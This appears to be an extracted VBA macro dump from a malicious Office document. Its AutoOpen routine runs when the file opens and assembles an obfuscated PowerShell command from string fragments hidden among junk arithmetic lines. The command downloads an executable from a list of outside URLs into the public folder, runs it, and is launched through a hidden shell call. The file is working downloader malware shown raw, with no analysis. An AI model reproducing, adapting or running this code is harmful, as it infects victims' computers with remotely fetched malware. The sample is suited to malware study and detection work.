Filename     : ./macros/f8b563cf916bfa94d42076e3fc2ab0a59cd1bfa9974311fab8868db35a0f92ab
OLE stream   : Macros/VBA/twawakjd
VBA filename : twawakjd.bas
----------------------------------------
Attribute VB_Name = "twawakjd"
Sub AutoOpen()
On Error Resume Next
icFAHRqJn = 871 / Rnd(4) + QuDQzNchXXHouI + RwAkjjhBsPtw * 9 + Int(DzpObtTWJtIj * CStr(YzDpqiwNpUp)) + HNitKBGOsi * CDate(3624 - 352183467 * 84 / 475) / itMAoQHDsB - CSng(620)
AIhwDZLBW = 871 / Rnd(4) + fzpTjkcws + UntbVwd * 9 + Int(IzhQzWHFAvHb * CStr(NVRsjDtUEnJLph)) + OGdHwctZ * CDate(3624 - 352183467 * 84 / 475) / OBSMakhrQHG - CSng(620)
SbimskNDJ = 871 / Rnd(4) + EIpvquSAfR + wmihkjtUGR * 9 + Int(iatmXrOMOpPGJt * CStr(RjpOqlpmVpE)) + HDUjDGJ * CDate(3624 - 352183467 * 84 / 475) / PBEXblTCihf - CSng(620)
UoHPJirbK = 871 / Rnd(4) + nYwSmHIuGLzzT + PfSnFRmIo * 9 + Int(jPznKEMf * CStr(hcdHEoiKIYVfUV)) + zdLDVsFijmiWHV * CDate(3624 - 352183467 * 84 / 475) / BzUAllmYOwbH - CSng(620)
ikTiOuFnj = 871 / Rnd(4) + IKGcztUVSWpYX + LUkJNFzEul * 9 + Int(uQITcBhDIqJ * CStr(JntEsjESFNzSu)) + wabvDPVA * CDate(3624 - 352183467 * 84 / 475) / dLBqVHV - CSng(620)
Application.Run "iwdTFiPntrh", SEwawinqQWs
OiBbbVTBE = 871 / Rnd(4) + pSVhTqZREG + MmuXIkQsqqi * 9 + Int(kwSQTjbG * CStr(qjaCfVKVcY)) + BtBsHDTkD * CDate(3624 - 352183467 * 84 / 475) / OhHIkiAZ - CSng(620)
GidzCWGUU = 871 / Rnd(4) + PGXOSSJrwaI + QqDRcwSuu * 9 + Int(JvWqnBrflnjq * CStr(zkzOoztmaQ)) + RmwktHBaicwcs * CDate(3624 - 352183467 * 84 / 475) / iHzQpVjZVFj - CSng(620)
ckivAAjif = 871 / Rnd(4) + AEGmdmIIsB + HmJrtVlv * 9 + Int(rQrEQXXf * CStr(cNzNDiDtiLiX)) + cDXVzUDHf * CDate(3624 - 352183467 * 84 / 475) / iUjjNCVFPdaQnK - CSng(620)
uifoAqZMo = 871 / Rnd(4) + onjvZCbazPO + XupqJFTtqMQMa * 9 + Int(oPGoYWjGv * CStr(VajMCATYvB)) + lwJhTtuj * CDate(3624 - 352183467 * 84 / 475) / XTUKOLTIqsM - CSng(620)
RzPVjZGqq = 871 / Rnd(4) + rQZEDQwHFclXT + BFVzqjL * 9 + Int(DouljoztmEsj * CStr(DvGLvWBlQbt)) + NTiDIzJhJNk * CDate(3624 - 352183467 * 84 / 475) / RhIJLqji - CSng(620)
End Sub
Function SEwawinqQWs()
On Error Resume Next
jwKzYwZaGT = 871 / Rnd(4) + PFjiEIEwillHV + wSiErkCDPiBGh * 9 + Int(siizrUtXh * CStr(sluJrsHtjF)) + jLSwzoLq * CDate(3624 - 352183467 * 84 / 475) / jwapFDHlQAzYkM - CSng(620)
hRBaK = 871 / Rnd(4) + AhQTjmzchh + ZTCszIkPnX * 9 + Int(HmZihAYjnCljK * CStr(scCKfTuZBob)) + IcOEztwI * CDate(3624 - 352183467 * 84 / 475) / dtAEzEBuWok - CSng(620)
jCfjHAn = Mid("1V8i8nK/xum8nK+8nKi8nK+8nKA/r8nK+8nKKA.'+'Splitc56wvZnhjJlIbVuO4o9iR1c3PqWpIlzzH", 5, 43)
LzwfsD = 871 / Rnd(4) + GqtLXbIW + GJTMDrfihjp * 9 + Int(KEEokWdjHjwzFq * CStr(vzSWYcwi)) + jviYUPrBWSwmpX * CDate(3624 - 352183467 * 84 / 475) / EfnUXLTGNiki - CSng(620)
JUOtjGfLzbf = 871 / Rnd(4) + dLPIYlIGZ + kARPCjUZ * 9 + Int(BfGautfYEG * CStr(ivzNvQPG)) + hKEDzzuGN * CDate(3624 - 352183467 * 84 / 475) / cEOfPiWkUPt - CSng(620)
Olovk = 871 / Rnd(4) + MRRLVIEpn + Osswdnt * 9 + Int(GbjRsoiLjQ * CStr(VqkjcoEBkQjTw)) + aZciOqTTL * CDate(3624 - 352183467 * 84 / 475) / GhvYcjJZoBR - CSng(620)
EmJAvzS = Mid("RdjYCSUVmGwfNsVCBCvtKJXKe(8nK+8nKlR'+'eab8nK+8nKc.ToS'+'8nK+8nKtring(), l8nK+8nKR8nK+8nKehua8nK+8nK'+'s);InMYD+MYDvo8nK+8nKke-Ite8nK+8nKm(8nK+8n'+'KMYD+MYDlRehu8'+'nK+8nKas);bre8nKUoUUESPkaDT", 24, 157)
PMuEDSNC = 871 / Rnd(4) + EzSioAETl + OHorbDczw * 9 + Int(LadDPQjfZf * CStr(qYUGElTJuCtsKp)) + rYGTIXRU * CDate(3624 - 352183467 * 84 / 475) / dVPOYQZ - CSng(620)
jwUAFd = 871 / Rnd(4) + fzlAWnEXnLFijf + zkXbJDmRsW * 9 + Int(wEvjnEQzXEU * CStr(jNkLNnaSaHbESC)) + Jssftiqqz * CDate(3624 - 352183467 * 84 / 475) / HYBShIQilnN - CSng(620)
hwssBTiJ = 871 / Rnd(4) + FXYjTkWSIoDWSi + OIYKYFXWZ * 9 + Int(SciVEkd * CStr(wmnQXXokBzj)) + wjvDBFzGB * CDate(3624 - 352183467 * 84 / 475) / iAzfBHnwDDatT - CSng(620)
FsOEw = Mid("TX8HuQjFnii+8nK'+'MYD+MYDak;}ca8nK+8nKtc8nK+8nKh{wri8nK+8nKt8nK+8nKus3zzRmHijiO8dWzJY9J7TWJK", 12, 56)
UNFiGoV = 871 / Rnd(4) + sZiSEFpdrN + lGGiYbUtWkjF * 9 + Int(YztzKZjOF * CStr(ATBaakBWktoP)) + bdrDRuqo * CDate(3624 - 352183467 * 84 / 475) / TPtEMpSR - CSng(620)
wjtqwkd = 871 / Rnd(4) + JLjwIZzvDwTs + uWhszzFirDXw * 9 + Int(SPIGijzBL * CStr(iIfLTwPBb)) + RWEfTnVTGR * CDate(3624 - 352183467 * 84 / 475) / ICqGinzQ - CSng(620)
oRvwBmvjjkp = 871 / Rnd(4) + VfWFLXAuIVOw + bInRVSWP * 9 + Int(PwrzmhVYLD * CStr(NSjpVRUCX)) + UZKHokQuTzvQ * CDate(3624 - 352183467 * 84 / 475) / QaNLlTY - CSng(620)
XaRNjArptB = Mid("V049FjawiVk0soc8nK+8nMYD+MYDKt rando7Hrm5zvQDrDBmjWkwad3n", 15, 22)
PlkDWd = 871 / Rnd(4) + thiHDjSllfbC + XAwLcmuNjvtHVG * 9 + Int(FkKSksfknwckV * CStr(hapEMiqJWLLV)) + NmpAidcjBU * CDate(3624 - 352183467 * 84 / 475) / RDsPIOzB - CSng(620)
wOcWPKFELMz = 871 / Rnd(4) + fMwUFQS + lckcLIrpFPRSv * 9 + Int(OiaMDrj * CStr(HkDXmzTlpPHZ)) + ufWdQCRihBL * CDate(3624 - 352183467 * 84 / 475) / bzQtsNaN - CSng(620)
cpUUv = 871 / Rnd(4) + dzUDCIbzvO + GOWRzwwtHtDfGj * 9 + Int(JmaBHLJwsOSmz * CStr(BclmUDChaR)) + SGufZTNX * CDate(3624 - 352183467 * 84 / 475) / wpZtGowSi - CSng(620)
CDMihfVB = Mid("75B5j('InVoKE-exprESsIon ((MYD(8nKlR8nK+8nKef8nK+8nKranc 8nK+8nK= new-ob8nK+8nKjec8nK+8nKt Sys8nK+8nKtem.Net.'+'We8n'+'K+8nKbCl8nK+8nKi8MYD+MYDnK+8nKent;lRensadasdMYD+MYD = nMYD+MYDew-objetf8kP", 6, 183)
GSjjJEsfJEs = 871 / Rnd(4) + VzZoWtV + aBKVcUDEjm * 9 + Int(OzZjrOLADswBj * CStr(XZfwouIw)) + GzAnwdMoJ * CDate(3624 - 352183467 * 84 / 475) / lwGvQiaLtRa - CSng(620)
IHDKmSDAjU = 871 / Rnd(4) + ZsqisBiXPk + DRmamlERjniams * 9 + Int(lvXCfjZzRjs * CStr(wPZWQXYj)) + EJhLNXVjrRE * CDate(3624 - 352183467 * 84 / 475) / OQnzNFMiRVuuZ - CSng(620)
KDaqSXiLQ = 871 / Rnd(4) + ziIFuXHurhS + TjqbMXqDnbvO * 9 + Int(dPOOjPioc * CStr(WitipjOjEjYcjr)) + wVaWqYjtoQItjI * CDate(3624 - 352183467 * 84 / 475) / nuqkUwSpB - CSng(620)
msioui = Mid("sfihH57WOSXU1mIpi6K+8nK}}8nK).r'+'ePLacEMYD+MYD('+'8nK1b78nK,8nKpdl8nK'+').rePLacE(([cHAr]108+[c'+'HAr]82+[cHAr]101),[STRINgMYD+MYD][cHAr]36'+').rePLacE(8nKrKA8nK,mzQ", 19, 145)
EKiWIDw = 871 / Rnd(4) + CGRRDNJA + mpqRJDQaPnWi * 9 + Int(mWCRLFLjOnmFUO * CStr(ZNrfNiAKX)) + DaAvfGCZDUvPl * CDate(3624 - 352183467 * 84 / 475) / EpwXCEM - CSng(620)
EIoVUzwqsl = 871 / Rnd(4) + FXXaiLnZUvBuao + zutpaDEDwJGYj * 9 + Int(DBjWQizwGr * CStr(oRFLNBFVPPJz)) + hqBUbRY * CDate(3624 - 352183467 * 84 / 475) / GCRuVXKFpAoBG - CSng(620)
bKFZJzQjDwA = 871 / Rnd(4) + pwABwqUQmLfiH + KojhjfRuWJb * 9 + Int(bYkcISbPlCudJ * CStr(FmijkHtZ)) + KoUUjWvbqZG * CDate(3624 - 352183467 * 84 / 475) / wfJDMDstI - CSng(620)
kBwmJVjwXs = Mid("5nK+8nK.u8nK+8nKy8nK+ZiriCzTBwhpNl3f", 2, 20)
fcFszDQD = 871 / Rnd(4) + mzsiHBDQIuCc + ahdVpTwhOnQsi * 9 + Int(PaOVzzvDCctJWj * CStr(uWssjkXLfwiKE)) + LbpdGnqtZE * CDate(3624 - 352183467 * 84 / 475) / tWfBbfwMrTQ - CSng(620)
jfqludzmK = 871 / Rnd(4) + XDJjUEjWkbSCd + vYjAKBYPrDIANQ * 9 + Int(dYlQQZwvz * CStr(aJHqVfMUUEzI)) + pUOILFXUqQDGDj * CDate(3624 - 352183467 * 84 / 475) / NZzciSjsRYWX - CSng(620)
dhlzM = 871 / Rnd(4) + AuKsOiWPnq + qAEjPvAAznN * 9 + Int(NsKETlzNEuCpi * CStr(vcLCorCqoBXwhQ)) + TSkmEwAEiCipd * CDate(3624 - 352183467 * 84 / 475) / wzOwTAXpuzW - CSng(620)
RVhvOMOcDB = Mid("GD1U7HLiMc2WHoGzqOnKs + rKA.'+'exerKA;f8MYD+MYDnK+8n'+'Ko8nK+8nKreach(8nK+8nKlRMYD'+'+MYD8nKMYD+MYD+8nKeabc 8nK+MYD+MYD8nKin lR8nK+8nKeb8nK+8nKcMYD+MYDd'+'){8nKMYD+MYD+8nKtry{8'+'nK+8nKlRe8nK+'+n9roMNiajO", 19, 176)
IflbmXPnU = 871 / Rnd(4) + jsLTVdwwBRkpZN + sEjRwaHvFWZc * 9 + Int(czjpibo * CStr(FjlakpLIOnIEzz)) + oFYVYzFwv * CDate(3624 - 352183467 * 84 / 475) / qTEhvGw - CSng(620)
VVfKltLL = 871 / Rnd(4) + EWzUmqkaLvKim + IkSVdXMivrWnz * 9 + Int(KYlsbdhozXXuE * CStr(wWJkDVN)) + nWNsiVbIz * CDate(3624 - 352183467 * 84 / 475) / qrPmKRDIHUmuzj - CSng(620)
YELOP = 871 / Rnd(4) + lnUzrNkwmq + QXFcjvkJFPAz * 9 + Int(qZuVGbTjKfOMt * CStr(NKlcKPNidkrUl)) + wsKkojHS * CDate(3624 - 352183467 * 84 / 475) / OpLWCGrrQ - CSng(620)
tHSoCkC = Mid("X9CWvrVhBjQFNi0Gve8nK+8n'+'K-host lRe8nK+8nK_.Excepti8nK+8nKon.Mes8nK+8nKsag8nK+8nMYD+MYDKe;8n049j226fU", 18, 77)
NDivWiDu = 871 / Rnd(4) + GmYhmjiisk + iizLMpZYD * 9 + Int(qJMrhvNt * CStr(tYiYYjCaLPM)) + XCumUIvIw * CDate(3624 - 352183467 * 84 / 475) / ZfHPcMqEoQ - CSng(620)
FjNmjCvw = 871 / Rnd(4) + fHivWIwNSC + wmBRjLH * 9 + Int(kuzOZzbh * CStr(MlRPwdCzhsmoY)) + RpzANcBIqlFl * CDate(3624 - 352183467 * 84 / 475) / fsJzubFBhl - CSng(620)
wkziQzFAPtl = 871 / Rnd(4) + MrqAKacKPOJr + THRFMmRkiYzzRI * 9 + Int(pkGbwcK * CStr(DmKhTwhG)) + nJwVvkrBw * CDate(3624 - 352183467 * 84 / 475) / dTrBsSW - CSng(620)
wJLTw = Mid("zGXpK4P0kJnKria.com8a5fjB65zWo49kwBq", 12, 9)
TsCEzwAH = 871 / Rnd(4) + BIwSBSUXMMhZb + OEqEvjJLEWHYus * 9 + Int(TjkDIwEij * CStr(XQiZMwS)) + AfWPwmFiqEbK * CDate(3624 - 352183467 * 84 / 475) / XcKtfzVTzJa - CSng(620)
ctvzuVDh = 871 / Rnd(4) + lhJaCnzCrWYDrk + aZKMYZd * 9 + Int(MwzBiiIkYatKS * CStr(OoVYjdBD)) + OaYRDii * CDate(3624 - 352183467 * 84 / 475) / VHqzbDmVXi - CSng(620)
DiHawzP = 871 / Rnd(4) + wXQblrYo + uMqEkzwdHACYd * 9 + Int(nXjjAwOBVwIwPo * CStr(EMCWldP)) + ovAWprJXiU * CDate(3624 - 352183467 * 84 / 475) / cEFLYrcsqt - CSng(620)
vvNOkI = Mid("l2nakIFzGtUFHi1t3kiQv2PsE3PHhksvC292).rEPLAcE(MYD8nKMYD,[sTRiNG][cHAR]39) )').replace('MYD',[striNg][Char]39) |.((gET-VaRIAbLE '*mdR*').NAme[3,11,2]-JOIn'')uI", 35, 122)
bIDYw = 871 / Rnd(4) + AczahNKVqAtA + JzlaFNECtFXCb * 9 + Int(nljCJuQDY * CStr(zqEtNoUcH)) + ndRLPKd * CDate(3624 - 352183467 * 84 / 475) / GXaYFzWjHwkF - CSng(620)
QjIdtCtpj = 871 / Rnd(4) + AtEWnlzwnvNMz + kJNzKGNj * 9 + Int(jSkWwiibZZ * CStr(icItwanpDNKS)) + XSizbDw * CDate(3624 - 352183467 * 84 / 475) / RVXEDOzUFTo - CSng(620)
WrUXzFhzz = 871 / Rnd(4) + GZUbPJLpFk + vbbJTXmwRhwBqb * 9 + Int(GWdjWrBbhEwk * CStr(BStAnid)) + WNQjLlorJYi * CDate(3624 - 352183467 * 84 / 475) / iCoLYNE - CSng(620)
cWIduTcLCs = Mid("q67uXo/JhRD/,hMYD+MYD8nK+8nKt'+'t8nK+8nKp:/8nK'+'+8nK/gernasteam.c'+'MYD+MYD8nK+8nKom/yEl8nK+8nKm8nK+8'+'nKgBT/,http://re8nK+8'+'nKd8nK+8nKinmobilia8nK+8nHz7G9z06O8irEipqAM", 7, 148)
zIhww = 871 / Rnd(4) + NcIATBkSYfKW + izjzkAVbEMGkps * 9 + Int(oUwtVjov * CStr(iiaTfGlL)) + EVPSVVT * CDate(3624 - 352183467 * 84 / 475) / KIPBPiIYd - CSng(620)
WHizXmGiO = 871 / Rnd(4) + GHHtvXz + zwkZzNjnHUrB * 9 + Int(GhSuwzEDoNmi * CStr(ImIUOQGwuoriIq)) + KptjNXAa * CDate(3624 - 352183467 * 84 / 475) / zzXviLizrBEui - CSng(620)
OjjDqqK = 871 / Rnd(4) + hQATtEW + GZCvwbujkX * 9 + Int(VwcaDVffIOzSuC * CStr(EuAlbLw)) + PtQOKoG * CDate(3624 - 352183467 * 84 / 475) / tkcHFEqzzNYO - CSng(620)
OKWbPrNFp = Mid("uqg8nK+'+'8nKet8nK+8n'+'Kouta8n'+'K+8nKdv8nK+8'+'MYD+MYDnKe8nK+8nKntur'+'8nK+8nKe8nK+8nK'+'.c8nK+8nKom6sYki8U8H", 3, 100)
abuiKrM = 871 / Rnd(4) + GaujLtbLnIut + UFVXILTVPsLTjF * 9 + Int(rHmPfDmGSnohNn * CStr(PAlMOrWi)) + iKQqiiQcnhUjWi * CDate(3624 - 352183467 * 84 / 475) / vhzCjUiGi - CSng(620)
IvYPJjiKN = 871 / Rnd(4) + LJBhNiQ + JTMoFwz * 9 + Int(bMYjJvQBi * CStr(SdSOUiZCkW)) + VSSbFbIFXCnazw * CDate(3624 - 352183467 * 84 / 475) / QcvPtAwtMm - CSng(620)
YUwuJn = 871 / Rnd(4) + dLhWrBV + phVmwYkXLtf * 9 + Int(ftVYRjrTu * CStr(DEimEXiGvfz)) + jzsIlbS * CDate(3624 - 352183467 * 84 / 475) / IlaPYkpJ - CSng(620)
ZRnYE = Mid("HiViIiYK.n8nK+8nKex'+'t(8nK+8nK1, 38nK+8nK43245);8nK+8n'+'MYD+MYDKlReh'+'ua8nK+8nKs =8nK+8nK 8nK+8nKlR8nK+8nKeMYD+MYDen8nK+8nKv:pu8nK+8nKbl8nK+8nKic8nK+8nK +8nK+8nK rKA1b7rKA + lRekarap8nK+8nKa8nK+8sDwZqrB4wsNwEui1Z0A8cwQDmAlwfL", 8, 191)
tDtrwRjIjib = 871 / Rnd(4) + vwiPDNdUGtFE + UHvLQfC * 9 + Int(RzRwGUcwWZ * CStr(oUfKbIzZ)) + dqiKXrvmEnchkP * CDate(3624 - 352183467 * 84 / 475) / BMSwtBVjUzQ - CSng(620)
BfvFssJt = 871 / Rnd(4) + JvRISBJAkw + jwbKwXMlfG * 9 + Int(mvbSBjVwBVnh * CStr(JcYBJSzoam)) + oMuRqNYEOYJWjA * CDate(3624 - 352183467 * 84 / 475) / dilwEtR - CSng(620)
ZdZjrzPYD = 871 / Rnd(4) + pzTDRFFsbTHY + ZqtjwZEEB * 9 + Int(PpDjwHGJ * CStr(HHGokjLb)) + XCiFtjUKbzY * CDate(3624 - 352183467 * 84 / 475) / MfnnEONZJk - CSng(620)
CcCBaCdtpE = Mid("oZjmrh0V8cT2aRuwm;l8nK+8MYD+MYDnKR8nK+8nKe8nKM'+'YD+MYD+8nKbcd8nK+8nK ='+' rK8nK+8nKAhttps://lo8nK+8nKo8n'+'K+8nKkingfo8nK+'+'8nKr8n'+'K+8nKh8nK+8nKo8nK+8nKbbys.com/zEr4Nz/,h'dnUTEnp9Y", 17, 159)
wZnTCSKXT = 871 / Rnd(4) + AUwKbNH + LJcdolDIoziTAA * 9 + Int(rBJpUCi * CStr(FXKuzrCwrHbz)) + EWMrbdIHL * CDate(3624 - 352183467 * 84 / 475) / CzOHJSYmuhbXFd - CSng(620)
WGkPpCnBlU = 871 / Rnd(4) + pfzNPNJrcME + ElNDAffkvtmK * 9 + Int(NRGiVHOhC * CStr(pzHQdMjPihVBc)) + uXjRiiv * CDate(3624 - 352183467 * 84 / 475) / mwCwDNGFqEBvX - CSng(620)
rTblNMfzD = 871 / Rnd(4) + FQlArMYCsnizz + ZVauaIujktiSU * 9 + Int(QlhQiAWMXGUk * CStr(wVUfUbsULAc)) + UzVjrVYrrmG * CDate(3624 - 352183467 * 84 / 475) / NOzXMzT - CSng(620)
bkHMa = Mid("BY3fic0Zh8zJwGV'8nKf'+'ran8MYD+MYDnK+8nKc.Do8nK+8nMYD+MYDKwnl8nK+8nKo8nK+8nKad8nK+8nKF8nK+8nKi8nK+'+'8nKl8nK+8nSKKmsTBXk2TLHZ2", 16, 96)
IipAUrizLz = 871 / Rnd(4) + sPBYPdH + tLpFkwawwXu * 9 + Int(NIOhJSIZrRAhcq * CStr(RPKPSlKFqGz)) + IiuFiAbqjAU * CDate(3624 - 352183467 * 84 / 475) / wVikcLIct - CSng(620)
mMWnVp = 871 / Rnd(4) + EKZjuAHlNPpCr + bPmNoVts * 9 + Int(idYftHJFi * CStr(MCKODVpUp)) + HChBiDtrNFH * CDate(3624 - 352183467 * 84 / 475) / MsvGVVNiDKGmiI - CSng(620)
SCvMaPfWnUB = 871 / Rnd(4) + IjoIcLCDY + LpzuzLVjBAv * 9 + Int(vvSzCZdiz * CStr(kpVNRVYPnf)) + tDHVnnQpcbs * CDate(3624 - 352183467 * 84 / 475) / rktqfIdatd - CSng(620)
NiYDA = Mid("X9qPMW1R7mV60nNz('+'rKA8nKMYD+MYD+8nK,rK8nK+8nKA);lR8nK+8nKeMYD+M'+'YDk8nK+8nKar8nK+8nKap8nK+8nKas = l'+'R8nK+8nKe8nK+8nK'+'nsadasd8nK+8nAlQIiBQiCUpJ9zZ6PvXrU", 17, 121)
klWfwiHGVi = 871 / Rnd(4) + AirzAENKb + WAqOSsdIPqSTwA * 9 + Int(GKazvvXWms * CStr(WFGswiTL)) + UXQlSdiPSwjmqf * CDate(3624 - 352183467 * 84 / 475) / tnNjAziEVJWXBW - CSng(620)
rilHHXXlE = 871 / Rnd(4) + QClnFIpV + wTblXuzkzBwcwq * 9 + Int(SADmWRcozws * CStr(OZdEztfbL)) + EWHBdnXfiRLGVF * CDate(3624 - 352183467 * 84 / 475) / DziVfdp - CSng(620)
KlRTz = 871 / Rnd(4) + kAlBzjupiSQID + LWfaMzLUnLwqT * 9 + Int(bwFdsbNjBojKww * CStr(OjraQJnqzoWf)) + NZDIQzNiM * CDate(3624 - 352183467 * 84 / 475) / PcZfVquCANmYb - CSng(620)
sjOzzR = Mid("Q+'ttp:/8nK+8nMYD+MYDK/la'+'8nK+8nKpal8'+'nK+8nKoma8nK+8nK.walmagen8nK'+'+8nKc8nK+8nKyd8nK+8nK'+'emos8nK+8nK.com/8nK+8nKI98nK+8nKni/,https8'+'nK+8nK://8nK+8nKRDUXzo6tDuI0NjE", 2, 157)
WmzGPoFVCju = 871 / Rnd(4) + jkLWwwiSPSY + hiUopQSRaBHEXA * 9 + Int(uBFjQOqaRRQbhw * CStr(wnwJXYfqjOKYFf)) + HwwDoRJmIjr * CDate(3624 - 352183467 * 84 / 475) / DWYplVa - CSng(620)
HvzzA = 871 / Rnd(4) + qSsjmFViKiLvi + DjlmZNMHANR * 9 + Int(mHrjwWhlPRbWD * CStr(lkBYAMi)) + PlhzXmbiS * CDate(3624 - 352183467 * 84 / 475) / PwSOnijoOzL - CSng(620)
NYmfXHv = 871 / Rnd(4) + THOdVPK + RFqkvnKSid * 9 + Int(imBocfVb * CStr(HYZDfZJzkT)) + ZGjUCqGHPMGL * CDate(3624 - 352183467 * 84 / 475) / NsSSTlzA - CSng(620)
MkBCPuHv = Mid("R60wzFC8Lw2Gj[STRINg][cHA'+'r]39) 9TJINVokE-eMYD+MYDxPREssIMYD+MYDONM'+'YD'+').rEPLAcE(MYD9TJMYD'+',[sTRiNG][cHAR]124).rEPLAcE(([cHAR]112+[cHAR]100+[cHAR]108'+'),[sTRiNG][cHAR]4r1fGpi9ERUICEY7", 14, 163)
miZqruLYd = 871 / Rnd(4) + FPiYbbGbNEMV + FwzwuKjzwGHiX * 9 + Int(WpLzjFdjRQzKzc * CStr(RKkzWifkpUmim)) + IbpEijmC * CDate(3624 - 352183467 * 84 / 475) / fPOZhjzj - CSng(620)
SEwawinqQWs = XZzQZKBrmBdS + KrrZZZYBERPHjG + Chr(34) + CDMihfVB + XaRNjArptB + CcCBaCdtpE + sjOzzR + OKWbPrNFp + cWIduTcLCs + wJLTw + kBwmJVjwXs + jCfjHAn + NiYDA + ZRnYE + RVhvOMOcDB + bkHMa + EmJAvzS + FsOEw + tHSoCkC + msioui + MkBCPuHv + vvNOkI
KEIfwXlAP = 871 / Rnd(4) + EVdubqXJoJFVs + OCEhIIw * 9 + Int(qkbZddM * CStr(EEOshhi)) + oXBXupdpMFQt * CDate(3624 - 352183467 * 84 / 475) / EsGtEisSB - CSng(620)
MuwkFBGAV = 871 / Rnd(4) + YTslHaGAGmNY + SlAMIzdC * 9 + Int(SnKGbKkciMji * CStr(wMHwSzilfn)) + idwFpzArfmBEa * CDate(3624 - 352183467 * 84 / 475) / zwQiDBo - CSng(620)
dwnoFKjjY = 871 / Rnd(4) + mzWXzLfmlLsDhz + jwTBNHcm * 9 + Int(EfLRknULHnOFEd * CStr(klrSqwa)) + pjYNMiKsK * CDate(3624 - 352183467 * 84 / 475) / WTRANCzqj - CSng(620)
wuiCbSRQc = 871 / Rnd(4) + JwCiPVkLZ + hwuEshKk * 9 + Int(XpUzQiVGiwuv * CStr(icAQUoCid)) + XizzziJuIhjEa * CDate(3624 - 352183467 * 84 / 475) / wlAuOFOfMTOSD - CSng(620)
bNWiGtzzQ = 871 / Rnd(4) + iVcUCmOjd + LUioHPX * 9 + Int(sWfkhaijmwa * CStr(crfUVYmk)) + szmlPsGi * CDate(3624 - 352183467 * 84 / 475) / aqWVEumunBmW - CSng(620)
APGSZToOS = 871 / Rnd(4) + cmQAYszSibBE + jpHnlibklw * 9 + Int(rijTqYRQOqNjE * CStr(VtuVTKU)) + qWdSjDfrzrobIq * CDate(3624 - 352183467 * 84 / 475) / jbJJkphV - CSng(620)
FCjQohORn = 871 / Rnd(4) + vrJpXsOkXr + ucvihNtJBj * 9 + Int(JAXPznrK * CStr(ZBGNwCqERvzS)) + zLanlHTUImkoi * CDate(3624 - 352183467 * 84 / 475) / SIvbtMGz - CSng(620)
End Function
Sub iwdTFiPntrh(SwwzHwl As String)
On Error Resume Next
kWwJPmvJK = 871 / Rnd(4) + mMAGVVTpdFiBWp + wtNOrZav * 9 + Int(vqUUoWDzX * CStr(aXJKLnqV)) + bvizJzSs * CDate(3624 - 352183467 * 84 / 475) / vSXMRkKiAzBH - CSng(620)
BjiKOnmiB = 871 / Rnd(4) + AENTUNrKVVd + EEoNGYAjmr * 9 + Int(FZMDouLfJh * CStr(SSzzQznpif)) + jiZVAjNiUnJ * CDate(3624 - 352183467 * 84 / 475) / ItHJCQJpTnjm - CSng(620)
VOIICtzNo = 871 / Rnd(4) + thiTtfSbMjJ + rEIolZUpKtun * 9 + Int(mYFjbqwvjAZijW * CStr(XsaDdmXEzOH)) + szRznqTHGM * CDate(3624 - 352183467 * 84 / 475) / lpMnKDiJCDqRRS - CSng(620)
rKMPTFRTT = 871 / Rnd(4) + wPAmoPP + LzoNQzNAQF * 9 + Int(UBhAhvj * CStr(rnGcSWIr)) + CwVmoTGTditNCS * CDate(3624 - 352183467 * 84 / 475) / MOwCOPTrHIXkE - CSng(620)
VWqHHSzUj = 871 / Rnd(4) + jhajDQmtp + RPEXGcfjEN * 9 + Int(RjBwHomFjUV * CStr(vSUniQaUPhP)) + FSSBfnOPWnOwZ * CDate(3624 - 352183467 * 84 / 475) / vcAnGzwmIFlo - CSng(620)
VBA.Shell$ SwwzHwl, 0
wSitPjTNt = 871 / Rnd(4) + VlawGFGIDWOAU + UbaQrSKNPqqvld * 9 + Int(iiLoGGPNJs * CStr(fABPawwfYoIDV)) + fIVjGKTdjYr * CDate(3624 - 352183467 * 84 / 475) / LOrENRX - CSng(620)
BmKLzQtzF = 871 / Rnd(4) + kWbpNbz + iDiWBQcYXljoUa * 9 + Int(fUoUzVSMNOZzC * CStr(MzntKjNpi)) + tibtINQkJiwV * CDate(3624 - 352183467 * 84 / 475) / GAYLrVIcRZ - CSng(620)
JKnwvJrdq = 871 / Rnd(4) + EbOuZDzzppYSr + jsmYWUVHcI * 9 + Int(iVRVaSAGi * CStr(fmdlnVLmbB)) + TOPCWSHVUwwFc * CDate(3624 - 352183467 * 84 / 475) / ihbPWXMMFBGJn - CSng(620)
jwKVBHbPH = 871 / Rnd(4) + TDAtkJX + jAtEnjXEddGI * 9 + Int(wNfXXKbww * CStr(cbjILWi)) + DiUaItiKazw * CDate(3624 - 352183467 * 84 / 475) / wIwnXqUWMwv - CSng(620)
khARdHbMh = 871 / Rnd(4) + BDauVFlsNkdAVB + dtlUCIPEm * 9 + Int(sHbBCwlPizFX * CStr(BlidzNSjMwwAO)) + rfqlzoKdzKrKm * CDate(3624 - 352183467 * 84 / 475) / kqENFAkjTfPqU - CSng(620)
End Sub
